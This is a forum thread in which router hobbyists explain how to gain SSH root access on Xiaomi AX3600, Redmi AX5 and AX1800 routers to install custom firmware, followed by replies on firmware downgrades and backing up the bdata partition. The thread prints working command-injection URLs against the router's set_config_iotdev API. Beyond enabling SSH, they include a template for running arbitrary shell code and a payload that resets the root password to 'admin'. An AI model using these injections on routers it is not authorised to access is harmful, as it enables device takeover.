Xiaomi ax3600 ssh guide

Half a year has passed since the release of the xiaomi wifi6 router ax3600. And finally we can get the ssh access on it.
The origin exploit is found by LonGDikE from Chinese Enshan forum.
Here are the steps:

  1. Downgrade your router to 1.0.17 version:http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r3600/miwifi_r3600_firmware_5da25_1.0.17.bin
  2. Login in to your router and get the STOK like follwing:
    http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/web/home#router
  3. Access these urls in browser:

(nvram set ssh_en=1;nvram commit)
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3Bnvram%20set%20ssh%5Fen%3D1%3B%20nvram%20commit%3B

(sed -i 's/channel=.*/channel="debug"/g' /etc/init.d/dropbear)
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3Bsed%20-i%20's/channel=.*/channel=%5C%22debug%5C%22/g'%20/etc/init.d/dropbear%3B

(/etc/init.d/dropbear start)
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B/etc/init.d/dropbear%20start%3B

  1. If everything is ok ,the ssh is enabled now.

PS: You can excute any shell code like this:
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B<your encoded shell code>%3B

6 Likes

First Thanks for this recopilation to enable ssh!

For someone that have a redmi ax5, this tutorial work too for enable ssh in this device.

I was tested this with firmware 1.0.16

Want to add how to change password easy to login ssh , its come from the same author LonGDikE.

Change Root password to "admin" when ssh is enabled, later you can change as usual in terminal.

http://192.168.31.1/cgi-bin/luci/;stok=/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B

Hope me english is enought to understandme.

Did your Redmi AX5 have version 1.0.16 installed when you received it or did you downgrade?

I'm wondering how to find the download links for previous versions for the Mi AX1800.

Yes recieved with 1.0.16 in ax5.

If find something for AX1800 i talk to you

1 Like

I think I need to downgrade to 1.0.34, the link is available on right.com.cn forum but I'm not a member, maybe someone with access could post it here.

Edit: No need to downgrade, gained SSH access to the Mi AX1800 running latest 1.0.336 firmware after a reset and setup in router mode, in AP mode is didn't work.

I also have the AX5 and would love to load OpenWrt on it. Is there anything I can do to assist?

Looks like SSH can be permanent but I'm having trouble with the chinese forum... if someone could translate all the steps here, please...

"AX3600 permanently open telnet-ssh, you can upgrade and restore at will"
https://www.right.com.cn/forum/thread-4045295-1-1.html

edit: I managed to translate the post, but I can't get the attachment :frowning:

Step 1: Back up Xiaomi's bdata partition, which contains the router's sn code ssh and other information. Before operation, confirm the partition details of the router:

root@XiaoQiang:~# cat /proc/mtd | grep bdata

mtd9: 00080000 00020000 "bdata"

You can see that my bdata partition is mtd9. Then enter the following command:

nanddump -f /tmp/bdata_mtd9.img /dev/mtd9

After the backup is complete, copy the bdata_mtd9.img file to the computer in the /tmp directory. You can use the winscp software to copy directly, or use the scp command to copy
After the copy is completed, for safety reasons, I suggest to make another copy and save it, just in case